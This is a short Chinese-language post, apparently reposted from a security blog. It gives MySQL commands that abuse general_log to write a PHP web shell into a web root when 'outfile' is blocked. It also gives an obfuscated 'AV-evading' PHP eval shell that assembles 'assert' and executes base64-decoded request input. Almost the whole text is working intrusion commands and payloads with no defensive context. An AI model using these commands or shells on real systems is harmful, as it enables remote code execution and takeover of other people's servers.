outfile被禁止,或者写入文件被拦截;
在数据库中操作如下:(必须是root权限)
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址
select '<?php eval($_POST[cmd]);?>' #写入shell
SQL查询免杀shell的语句
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_='a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
文章出处:Evi1cg's blog
原文链接:
https://evi1cg.me/archives/test1.html
推荐文章++++
文章好看点这里
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650458803&idx=3&sn=13147d4db6e97dbe91c5fc49131e2c24&chksm=83bbaf57b4cc26417a55ff944288bc551bce126f5a29bdd10c9e262ebb1768c30d6ac1339c86#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh